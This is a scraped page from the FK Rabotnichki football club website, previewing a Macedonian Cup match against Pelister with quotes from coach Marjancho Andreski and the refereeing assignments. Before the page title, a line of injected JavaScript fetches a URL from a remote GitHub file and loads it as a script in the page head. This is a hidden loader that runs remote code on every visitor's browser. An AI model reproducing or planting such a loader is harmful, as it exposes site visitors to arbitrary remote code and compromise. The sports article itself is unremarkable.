;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Андрески: Се трудиме да излеземе од кризата
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Андрески: Се трудиме да излеземе од кризата

Работнички е во лош ритам во првенството, но посакува да се пласира во четвртфиналето на Купот на Македонија. Утре (13.30 часот) нашиот тим ќе го пречека Пелистер на стадионот „Борис Трајковски“ во Маџари и се надева дека ќе успее да обезбеди пласман во следната рунда од најмасовното натпреварување.

На првиот дуел под „Тумбе кафе“, Работнички ремизираше против Пелистер (1-1).

„Работиме напорно и се надеваме дека брзо ќе излеземе од кризата. Ги анализираме грешките, се обидуваме да излеземе подобри и единствено мерило сепак се резултатите. Верувам дека тимот ќе одговори позитивно и ќе го покаже квалитетот на утрешниот куп-натпревар против Пелистер. Наша цел е пласман во следната рунда од ова натпреварување“, вели тренерот Марјанчо Андрески.

Главен судија на натпреварот ќе биде Албрим Шаќири (Струга), а ќе му помагаат Дарко Јовчевски (Тетово) и Фатон Мустафи (Тетово). Четврти судија ќе биде Фуркан Идризи (Тетово).

За делегат на натпреварот е одреден Рами Реџепи (Липково), а контролор на судењето ќе биде Ванчо Коцев (Штип).